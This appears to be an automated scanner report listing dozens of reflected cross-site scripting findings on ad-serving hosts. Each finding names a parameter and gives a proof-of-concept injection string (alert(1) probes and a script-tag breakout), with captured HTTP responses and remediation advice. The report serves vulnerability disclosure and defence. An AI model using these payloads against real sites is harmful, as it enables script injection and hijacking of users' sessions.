Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e29f0'-alert(1)-'495cc3a8968 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Thu, 11 Aug 2011 22:42:36 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:36 GMT Content-Length: 465
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54ed7'-alert(1)-'b5d97559d24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Thu, 11 Aug 2011 22:42:38 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:38 GMT Content-Length: 465
1.3. http://a.collective-media.net/adj/q1.nydailynews/be_news_fr [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/adj/q1.nydailynews/be_news_fr
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2432'-alert(1)-'629570ea7b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Thu, 11 Aug 2011 22:42:34 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:34 GMT Content-Length: 468
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfab9'-alert(1)-'5998b10273a was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Thu, 11 Aug 2011 22:42:32 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: dc=sea; domain=collective-media.net; path=/; expires=Sat, 10-Sep-2011 22:42:32 GMT Content-Length: 465
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload adf09'-alert(1)-'882062a794c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 31 Aug 2011 17:54:54 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Length: 7703
var cid='12244bc34a8b1dc';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-10212190423_1314813294","http://ib.adnxs.com/ptj?member=988&inv_code=ns.informitadf09'-alert(1)-'882062a794c&size=728x90&imp_id=ns-10212190423_1314813294,12244bc34a8b1dc&referrer=http%3A%2F%2Fwww.informit.com%2Findex.aspx%3F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fns.informitadf09%27-alert%281%29-%2788 ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49732'-alert(1)-'e101f0e3a6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3ae6'-alert(1)-'d4fccf3dad4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ab3'-alert(1)-'496270f1c8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb061'-alert(1)-'3b9133a92e3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0ad5"-alert(1)-"299ee2f63f6 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5599 Date: Thu, 11 Aug 2011 22:35:47 GMT
document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
fun ...[SNIP]... 65832709%3B3454-728/90%3B42962870/42980657/1%3B%3B%7Efdr%3D242952151%3B0-0%3B0%3B65830267%3B3454-728/90%3B42793270/42811057/1%3B%3B%7Esscs%3D%3fhttp://g.ca.bid.invitemedia.com/pixel?returnType=redirectd0ad5"-alert(1)-"299ee2f63f6&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=http://www.chevydealer.com"); var ...[SNIP]...
The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b85d2"-alert(1)-"9fb1a5c772 was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5598 Date: Thu, 11 Aug 2011 22:36:13 GMT
document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
fun ...[SNIP]... B3454-728/90%3B42962886/42980673/1%3B%3B%7Efdr%3D242952151%3B0-0%3B0%3B65830267%3B3454-728/90%3B42793270/42811057/1%3B%3B%7Esscs%3D%3fhttp://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Clickb85d2"-alert(1)-"9fb1a5c772&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=http://www.chevydealer.com"); var dcpass = ...[SNIP]...
The value of the message request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dc4b"-alert(1)-"25b430650 was submitted in the message parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5594 Date: Thu, 11 Aug 2011 22:36:42 GMT
document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
fun ...[SNIP]... .bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-1dc4b"-alert(1)-"25b430650&redirectURL=http://www.chevydealer.com"); var dcpass = "?cmp=OLA_BRAND_5198302_42962886"; var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the redirectURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e6bc"-alert(1)-"86ae1e132e1 was submitted in the redirectURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5386 Cache-Control: no-cache Pragma: no-cache Date: Thu, 11 Aug 2011 22:37:12 GMT Expires: Thu, 11 Aug 2011 22:37:12 GMT
document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');
fun ...[SNIP]... dia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=6e6bc"-alert(1)-"86ae1e132e1http://www.chevydealer.com"); var dcpass = "?cmp=OLA_BRAND_5198302_42962886"; var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; ...[SNIP]...
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3468"><script>alert(1)</script>4e3e8f5f0f was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d9e"><script>alert(1)</script>2194221d73c was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46cfb"-alert(1)-"dabdda859b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50b51"-alert(1)-"91173d12182 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52fec"-alert(1)-"55c76269dd8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e25a7"-alert(1)-"93324f8b867 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dadb"-alert(1)-"a0bf3312ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 926d3"-alert(1)-"2636b1944da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44dc9"-alert(1)-"0ee88ea36e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85077"-alert(1)-"33cf11815f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a664"-alert(1)-"9cedc40d16c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbc76"-alert(1)-"09d21fbc5ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e33a"-alert(1)-"065a4278d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56556"-alert(1)-"6b88251e67d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9013f"-alert(1)-"1cee8c0ee9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cd9a"-alert(1)-"4fcb73030b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f6b3"-alert(1)-"1ea28baa207 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1928"-alert(1)-"498b288b29c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e3d7"-alert(1)-"cd5633629a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93015"-alert(1)-"214765a46a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62600"-alert(1)-"64c1d70f5ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f62d4"-alert(1)-"b058ff9b208 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68891"-alert(1)-"8062c447371 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23e81"-alert(1)-"624d2126b2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f1c"-alert(1)-"52bc10e1626 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bceff"-alert(1)-"43132adc9ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6724"-alert(1)-"3898a6cbc75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dd3e"-alert(1)-"787499129a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25b30"-alert(1)-"9953fe8144b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5717a"-alert(1)-"218f6484cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70d3c"-alert(1)-"8b3b1df80a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d22f2"-alert(1)-"e9197d2134d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dea1"-alert(1)-"006abeca062 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb300"-alert(1)-"409ac85f166 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7777"-alert(1)-"a13f0a5b58b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40098"-alert(1)-"5bdb9e64bb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa8e5"-alert(1)-"356cce5b60c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29180"-alert(1)-"7329e8c1b16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ef6f"-alert(1)-"e393df477e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb17d"-alert(1)-"02e42cf89a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
